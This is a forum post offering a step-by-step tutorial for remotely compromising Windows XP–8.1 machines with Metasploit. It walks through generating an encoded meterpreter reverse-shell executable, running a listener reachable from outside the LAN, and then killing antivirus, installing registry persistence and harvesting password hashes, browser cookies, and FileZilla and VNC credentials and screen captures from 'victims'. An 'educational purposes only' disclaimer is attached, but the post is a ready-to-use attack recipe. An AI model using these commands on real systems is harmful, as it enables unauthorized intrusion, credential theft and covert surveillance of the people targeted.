Jump to content

Hack WIN XP,7,8.1 out of your LAN. [Kali 2.0]

Recommended Posts

This is a tutorial about how to hack Windows from version XP to 8.1(10??) from all around the world .


This tutorial is strictly for educational purposes only, I am not responsible for any of the action you may take upon others.

Follow my steps !

Step 1 : Install Kali Linux (Backtrack's exploits,payloads etc are outdated) .

Step 2 : Open a Terminal (Or Terminator) .

Step 3 : Type these commands :

apt-get update


use windows/meterpreter/reverse_tcp

show options

Now this will show up :

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique

LHOST yes The listen address

LPORT 4444 yes The listen port

set LHOST YourPublicIP #hack out of your LAN


set LHOST YourLanIP #hack in your LAN

ex for out-of-lan : set LHOST


ex for in-lan : set LHOST

show encoders #find yourself a encoder

generate -t exe -f virusexe -e thenameofencoder

use exploit/multi/handler

set LHOST yourlanip #ONLY YOUR LAN IP

set ExitOnSession false #so you can get many others connections

set PAYLOAD windows/meterpreter/reverse_tcp

Now there's a thing that you're gonna need to do : Port-forwarding.

Port Forward port 4444 or what port you chose.

exploit -z -j

After your victim ran the virus you should get this message in your terminal :

[*] Sending stage (885806 bytes) to (or whatever the victim's ip is)

[*] Meterpreter session 2 opened ( -> at DATE

run killav


migrate id #migrate to a process

run persistence -X -i 30 -p 4444 -r yourpublicipaddress/yourlanipaddress


run persistence -U -i 30 -p 4444 -r yourpublicipaddress/youtlanipaddress

#if you don't know what these -u,-x etc mean type in run persistence -h

#remember if you don't understand something always type in name -h then ask questions.

Something like this will show up :

[*] Running Persistence ....

[*] Resource file for cleanup created at ....

[*] Creating Payload= ....

[*] Persistent agent script is 123456 bytes long....

[+] Persistent Script written to ....

[*] Executing script ....

[+] Agent executed with PID 4504 ....

[*] Installing into autorun as HKCU\Software\Microsoft\Windows\Current Version\Run\qdWeheEDUKp #or whatever the name is at the end

[+] Installed into autorun as HKCU\Software\Microsoft\Windows\Current Version\Run\qdWeheEDUKp #or whatever the name is at the end

reg queryval -k HKCL\\Software\\Microsoft\\Windows\\Current Version\\Run -v qdWeheEDUKp #or whatever the name is at the end


reg queryval -k HKCU\\Software\\Microsoft\\Windows\\Current Version\\Run -v qdWeheEDUKp #or whatever the name is at the end

Useful commands (Not neccesary) :

help #find here awesome commands

run duplicate #you can run this so you can duplicate your meterpreter session if you execute risky commands your session might pe killed by the AV

run enum_chrome #download cookies,history,web data etc of your victim's Google Chrome

run enum_firefox #same but for firefox

run enum_putty #see putty connections

run get_application_list #get all names of the apps installed on victim's PC

run getcountermeasure #checks for firewall,antivirus and stuff

run get_env #extracts a list of all system and user environments variables

run getfilezillacreds #you know what this does cmon

run getgui #enables windows RDP

run get_local_subnets #gets a list of local subnets

run gettelnet #checks if the telnet is installed

run getvncpasswors #gets vnc passwordsduuuh ?

run hashdump #gets pasword hashes from SAM

run multicommand #you can run multiple commands on host

run multi_console_command #run multiple console commands on a meterpreter session

run multi_meter_inject #you know what this does

run packetrecorder #captures packets into PCAP files

run prefetchtool #extracts info for prefetch folder

run schelevator # exploit for windows privilege escalation and task scheduler 20 xml 0day by STUXNET

run scraper #obtain system info from victim

run screenspy #spies screen duuuh ???

run virtualbox_sysenter_dos #dos virtual box

run birusscan_bypass #kills mcaffe virusscan v870i+ procceses

This is Original Contnent

If it's not Original Contnent i asume my fault. I haven't seen any thread about this before.

Use this for legal purposes.

If this is used for illegal purposes it's not my fault it's only yours.

Edited by uktea3

Share this post

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Create New...